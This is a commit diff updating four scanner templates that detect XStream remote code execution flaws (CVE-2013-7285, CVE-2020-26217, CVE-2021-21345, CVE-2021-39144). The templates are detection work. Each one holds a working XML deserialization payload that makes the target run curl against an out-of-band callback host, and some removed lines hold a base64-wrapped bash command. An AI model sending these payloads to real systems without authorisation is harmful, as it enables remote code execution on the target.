fix xstream

patch-1
ViCrack 2023-05-07 00:36:32 +08:00
parent 6155b39e5b
commit 5b88116b2e
4 changed files with 28 additions and 33 deletions

View File

@ -2,16 +2,16 @@ id: CVE-2013-7285
info:
name: XStream <1.4.6/1.4.10 - Remote Code Execution
author: pwnhxl
author: pwnhxl,vicrack
severity: critical
description: |
Xstream API before 1.4.6 and 1.4.10 is susceptible to remote code execution. If the security framework has not been initialized, an attacker can run arbitrary shell commands by manipulating the processed input stream when unmarshaling XML or any supported format. This can allow an attacker to obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
reference:
- http://x-stream.github.io/CVE-2013-7285.html
- https://x-stream.github.io/CVE-2013-7285.html
- https://www.mail-archive.com/user@xstream.codehaus.org/msg00607.html
- https://www.mail-archive.com/user@xstream.codehaus.org/msg00604.html
- https://nvd.nist.gov/vuln/detail/cve-2013-7285
- https://blog.csdn.net/Xxy605/article/details/126297121
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -30,17 +30,21 @@ http:
Host: {{Hostname}}
Content-Type: application/xml
<sorted-set>
<string>foo</string>
<contact class='dynamic-proxy'>
<interface>org.company.model.Contact</interface>
<interface>java.lang.Comparable</interface>
<handler class='java.beans.EventHandler'>
<target class='java.lang.ProcessBuilder'>
<command>
<string>curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}'</string>
<string>curl</string>
<string>http://{{interactsh-url}}</string>
</command>
</target>
<action>start</action>
</handler>
</contact>
</sorted-set>
matchers-condition: and
matchers:
@ -52,6 +56,5 @@ http:
- type: word
part: interactsh_request
words:
- "User-Agent: {{rand_base(6)}}"
- "User-Agent: curl"
# Enhanced by md on 2023/04/12

View File

@ -2,7 +2,7 @@ id: CVE-2020-26217
info:
name: XStream <1.4.14 - Remote Code Execution
author: pwnhxl
author: pwnhxl,vicrack
severity: high
description: |
XStream before 1.4.14 is susceptible to remote code execution. An attacker can run arbitrary shell commands by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. Users who rely on blocklists are affected.
@ -47,7 +47,8 @@ http:
<outer-class>
<java.lang.ProcessBuilder>
<command>
<string>curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}'</string>
<string>curl</string>
<string>http://{{interactsh-url}}</string>
</command>
</java.lang.ProcessBuilder>
</outer-class>
@ -92,6 +93,5 @@ http:
- type: word
part: interactsh_request
words:
- "User-Agent: {{rand_base(6)}}"
- "User-Agent: curl"
# Enhanced by md on 2023/04/12

View File

@ -2,7 +2,7 @@ id: CVE-2021-21345
info:
name: XStream <1.4.16 - Remote Code Execution
author: pwnhxl
author: pwnhxl,vicrack
severity: critical
description: |
XStream before 1.4.16 is susceptible to remote code execution. An attacker who has sufficient rights can execute host commands via manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
@ -22,9 +22,6 @@ info:
metadata:
max-request: 1
variables:
rand: "{{rand_base(6)}}"
http:
- raw:
- |
@ -76,7 +73,7 @@ http:
</bridge>
</bridge>
<jaxbObject class='com.sun.corba.se.impl.activation.ServerTableEntry'>
<activationCmd>/bin/bash -c {echo,{{base64("curl http://{{interactsh-url}} -H \'User-Agent: {{rand}}\'")}}}|{base64,-d}|{bash,-i}</activationCmd>
<activationCmd>curl http://{{interactsh-url}}</activationCmd>
</jaxbObject>
</dataSource>
</message>
@ -102,4 +99,4 @@ http:
- type: word
part: interactsh_request
words:
- "User-Agent: {{rand}}"
- "User-Agent: curl"

View File

@ -2,12 +2,11 @@ id: CVE-2021-39144
info:
name: XStream 1.4.18 - Remote Code Execution
author: pwnhxl
author: pwnhxl,vicrack
severity: high
description: |
XStream 1.4.18 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. Setups which followed XStream's security recommendations with an allow-list are not impacted.
reference:
- http://x-stream.github.io/CVE-2021-39144.html
- https://x-stream.github.io/CVE-2021-39144.html
- https://github.com/x-stream/xstream/security/advisories/GHSA-j9h8-phrw-h4fh
- https://security.netapp.com/advisory/ntap-20210923-0003/
@ -22,9 +21,6 @@ info:
metadata:
max-request: 1
variables:
rand: "{{rand_base(6)}}"
http:
- raw:
- |
@ -67,7 +63,7 @@ http:
</probes>
</handler>
</dynamic-proxy>
<string>/bin/bash -c {echo,{{base64("curl http://{{interactsh-url}} -H \'User-Agent: {{rand}}\'")}}}|{base64,-d}|{bash,-i}</string>
<string>curl http://{{interactsh-url}}</string>
</java.util.PriorityQueue>
</java.util.PriorityQueue>
@ -81,6 +77,5 @@ http:
- type: word
part: interactsh_request
words:
- "User-Agent: {{rand}}"
- "User-Agent: curl"
# Enhanced by cs on 2023/04/17